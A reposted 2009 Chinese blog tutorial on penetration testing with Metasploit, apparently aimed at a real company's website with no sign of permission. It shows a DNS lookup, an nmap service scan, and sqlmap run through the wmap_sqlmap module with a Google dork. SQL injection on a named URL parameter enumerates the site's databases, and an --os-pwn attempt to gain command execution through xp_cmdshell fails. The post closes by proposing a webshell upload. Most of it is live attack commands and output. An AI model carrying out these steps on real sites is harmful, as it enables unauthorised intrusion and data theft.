源:http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html
作为一个知名的渗透测试框架,metasploit集成了几乎所有的入侵渗透工具,其强大的功能让人叹为观止。慢慢的发掘,你会喜欢上他的 今天我要给大家演示的就是如何在metasploit做入侵渗透测试,从基本的信息收集,到入侵,到内部渗透,所有的这一切都在metasploit中完成。首先我们更新metasploit到最新版本 root@ubuntu:/pentest/exploits/framework3# svn update root@ubuntu:/pentest/exploits/framework3# ./msfconsole | | _) | msf > 确定目标之后,首先我们要收集信息,比如DNS查询,服务器类型查询,端口开放信息查询,我们进行如下操作,至于为何这样,后面再做解释 msf > load db_wmap 接下来,我们查询目标主机iP msf > nslookup www.prolific.com.tw Server: 202.100.192.68 Non-authoritative answer: msf > db_nmap -sV -P0 -O www.prolific.com.tw –script=SQLInject.nse 未检测出sql注射漏洞,通过扫描我们发现目标主机开放了ftp服务,DNS服务,IIS服务,判断出操作系统是windows server 2003.因为DNS出现了远程堆栈溢出,我们首先尝试对目标机器进行溢出,执行如下操作。 msf > db_hosts 看来溢出无望了,接下来我们检测一下sql注射,这种站应该存在sql注射漏洞,OK,我们使用sqlmap模块 msf>use auxiliary/scanner/http/wmap_sqlmap msf auxiliary(wmap_sqlmap) > Name: SQLMAP SQL Injection External Module Provided by: Basic options: Description: 接下来,看我们的配置信息 Module options: Name Current Setting Required Description [*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80/index.php?id=1′ –method GET -g “site:www.prolific.com.tw ext:asp” –dbs –batch ok,到这里已经达到我们所想要的目的了,中止继续运行的进程…… Module options: Name Current Setting Required Description ok,检查无误,我们开始执行 [*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80//eng/downloads.asp?ID=30′ –method GET –os-pwn –msf-path=/var/pentest/framework3 –batch
A modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
版本6609。 已经是最新版本,启动framewokr3
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
msf > db_connect pentest
[*] Successfully connected to the database
[*] File: pentest
msf >
[*] exec: nslookup www.prolific.com.tw
Address: 202.100.192.68#53
www.prolific.com.tw canonical name = dns1.prolific.com.tw.
Name: dns1.prolific.com.tw
Address: 59.124.181.149
剩下的就是收集开放端口和服务信息,因为在metasploit里面有多种信息收集方式,出于个人习惯,我使用nmap,同时检测是否存在sqlinject漏洞,我们执行
[*] exec: “/usr/bin/nmap” “-sV” “-P0″ “-O” “www.prolific.com.tw” “–script=SQLInject.nse” “-oX” “/tmp/dbnmap20090602-28001-njyqqa-0″
NMAP:
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-02 03:14 CST
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/skype_v2-version.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/iax2Detect.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/PPTPversion.nse’ threw a run time error and could not be loaded.
NMAP: Interesting ports on 59.124.181.149:
NMAP: Not shown: 996 filtered ports
NMAP: PORT STATE SERVICE VERSION
NMAP: 21/tcp open ftp Serv-U ftpd 6.4
NMAP: 53/tcp open domain Microsoft DNS
NMAP: 80/tcp open http Microsoft IIS webserver 6.0
NMAP: 443/tcp closed https
NMAP: Device type: general purpose
NMAP: Running (JUST GUESSING) : Microsoft Windows 2003|2000|XP (98%)
NMAP: Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (98%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP Home SP2 (Russian) (93%), Microsoft Windows XP SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows 2000 Server SP4 (90%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (90%), Microsoft Windows Server 2003 Enterprise Edition SP2 (88%), Microsoft Windows XP Professional SP2 (French) (88%)
NMAP: No exact OS matches for host (test conditions non-ideal).
NMAP: Service Info: OS: Windows
NMAP:
NMAP: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
NMAP: Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Host: 59.124.181.149 Status: alive OS:
msf > db_services
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=21 proto=tcp state=up name=ftp
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=53 proto=tcp state=up name=domain
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=80 proto=tcp state=up name=http
msf>
ok,看参数信息
msf auxiliary(wmap_sqlmap) > info
Version: 5849
bernardo.damele <bernardo.damele@gmail.com>
daniele.bellucci <daniele.bellucci@gmail.com>
Name Current Setting Required Description
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS no The sqlmap options to use
PATH index.php yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY id=1 no HTTP GET query
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
This module launch a sqlmap session. sqlmap is an automatic SQL
injection tool developed in Python. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once
it detects one or more SQL injections on the target host, the user
can choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve DBMS
session user and database, enumerate users, password hashes,
privileges, databases, dump entire or user specific DBMS
tables/columns, run his own SQL SELECT statement, read specific
files on the file system and much more.
恩,具体的参数我就不解释了,接下来,设定参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set OPTS ‘ -g “site:www.prolific.com.tw ext:asp” –dbs’
OPTS => -g “site:www.prolific.com.tw ext:asp” –dbs
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS -g “site:www.prolific.com.tw ext:asp” –dbs no The sqlmap options to use
PATH index.php yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY id=1 no HTTP GET query
RHOSTS www.prolific.com.tw yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
ok,没问题,开始工作
msf auxiliary(wmap_sqlmap) > run
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:15:14
SQLMAP:
SQLMAP: [17:15:14] [INFO] first request to Google to get the session cookie
SQLMAP: [17:15:15] [INFO] sqlmap got 100 results for your Google dork expression, 69 of them are testable targets
SQLMAP: [17:15:15] [INFO] sqlmap got a total of 70 targets
SQLMAP: [17:15:15] [INFO] url 1:
SQLMAP: GET http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: do you want to test this url? [Y/n/q]
SQLMAP: > Y
SQLMAP: [17:15:15] [INFO] testing url http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: [17:15:15] [INFO] testing connection to the target url
SQLMAP: [17:15:16] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:15:18] [INFO] url is stable
SQLMAP: [17:15:18] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:15:20] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:15:20] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:15:22] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:15:22] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:23] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:15:25] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:15:25] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:27] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:28] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:15:28] [INFO] do you want to exploit this SQL injection? [Y/n] Y
SQLMAP: [17:15:28] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:15:30] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:15:30] [INFO] testing MySQL
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:15:31] [INFO] testing Oracle
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:15:31] [INFO] testing PostgreSQL
SQLMAP: [17:15:32] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:15:32] [INFO] testing Microsoft SQL Server
SQLMAP: [17:15:33] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:15:34] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:15:34] [INFO] fetching database names
SQLMAP: [17:15:34] [INFO] fetching number of databases
SQLMAP: [17:15:34] [INFO] retrieved: 7
SQLMAP: [17:15:42] [INFO] retrieved: master
SQLMAP: [17:16:43] [INFO] retrieved: model
SQLMAP: [*] msdb
SQLMAP: [*] Northwind
SQLMAP: [*] Prolific
SQLMAP: [*] pubs
SQLMAP: [*] tempdb
SQLMAP:
[*] Auxiliary module execution completed
msf auxiliary(wmap_sqlmap) >
接下来,我们要用metasploit来测试此注射点了,修改一下参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set PATH /eng/downloads.asp
PATH => /eng/downloads.asp
msf auxiliary(wmap_sqlmap) > set QUERY ID=30
QUERY => ID=30
msf auxiliary(wmap_sqlmap) > set OPTS ‘–os-pwn –msf-path=/var/pentest/framework3
OPTS => –os-pwn –msf-path=/var/pentest/framework3
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS –os-pwn –msf-path=/var/pentest/framework3 no The sqlmap options to use
PATH /eng/downloads.asp yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY ID=30 no HTTP GET query
RHOSTS www.prolific.com.tw yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(wmap_sqlmap) > run
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:48:11
SQLMAP:
SQLMAP: [17:48:11] [INFO] testing connection to the target url
SQLMAP: [17:48:12] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:48:14] [INFO] url is stable
SQLMAP: [17:48:14] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:48:15] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:48:15] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:17] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:48:19] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:48:19] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:48:22] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:48:25] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:48:25] [INFO] testing MySQL
SQLMAP: [17:48:25] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:48:25] [INFO] testing Oracle
SQLMAP: [17:48:26] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:48:26] [INFO] testing PostgreSQL
SQLMAP: [17:48:27] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:48:27] [INFO] testing Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:48:28] [INFO] testing stacked queries support on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] the web application supports stacked queries on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] testing if current user is DBA
SQLMAP: [17:48:39] [INFO] retrieved: 0
SQLMAP: [17:48:44] [WARNING] the functionality requested might not work because the session user is not a database administrator
SQLMAP: [17:48:44] [INFO] checking if xp_cmdshell extended procedure is available, wait..
SQLMAP: [17:48:44] [INFO] xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
SQLMAP: [17:48:45] [WARNING] xp_cmdshell re-enabling failed
SQLMAP: [17:48:45] [INFO] creating xp_cmdshell with sp_OACreate
SQLMAP: [17:48:46] [WARNING] xp_cmdshell creation failed, probably because sp_OACreate is disabled
SQLMAP: [17:48:46] [ERROR] unable to proceed without xp_cmdshell
SQLMAP:
SQLMAP: [*] shutting down at: 17:48:46
SQLMAP:
[*] Auxiliary module execution completed
啊噢,执行失败了,看来此注射点不是sa权限的,无法调用xpcmdshell,剩下的就是要考虑写入webshell了
All in one: pentest under metasploit
精选 转载hackfreer 博主文章分类:BackTrack5
文章标签 one 休闲 All metasploit pentest 文章分类 Windows Server 服务器
All in one: pentest under metasploit
2009-06-02 00:27
上一篇:使用metasploit收集邮箱
下一篇:WEB安全工具集
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
ThoughtWorks All In One
ThoughtWorks All In One
技术咨询 外包 ThoughtWorks -
promjs All In One
promjs All In One
monitoring system metrics 普罗米修斯 promjs Prometheus -
Prettier All In One
Prettier All In One代码格式化
代码格式化 Prettier js ESLint html -
PWA All In One
PWA All In One
Web APP TWA PWA App Google Chrome -
Flow All In One
Flow All In OneFlowTypePureComponent
React js FlowType flow 静态类型检查 -
JWT All In One
JWT All In OneJSON Web Tokens
Access Token JSON Web Tokens JWT OAuth 2.0 Refresh Token -
WebAssembly All In One
WebAssembly All In Onewasm汇编语言WebAssembly All In Onehttps://webassembly.org/getting-started/developers-guide/
WebAssembly web assembly 汇编语言 WASM -
WebXR All in One
WebXRWebXR All in OneWebXRVR / WebVRWebGLCanvasMixed RealityMR
web VR js canvas WebGL -
ORM All In One
ORM All In OneORMOOPSQL InjectionSQLNoSQLTypeScript ORM
SQL ORM OOP NoSQL SQL 注入 -
ESLint All In One
ESLint All In OneAirbnbeslint ignore.eslintignore
ESLint git hooks husky lint airbnb -
Parcel all in one
Parcel all in one
webpack parcel js bundle -
Redis all in one
Redis all in one
Redis all in one Redis redis -
svg all in one
svg all in onesvg all in one, svg, embed, object, iframe, background, img, js, HTML5, css
SVG Object iframe background img -
PostCSS All In One
PostCSS All In One
PostCSS webpack css json github
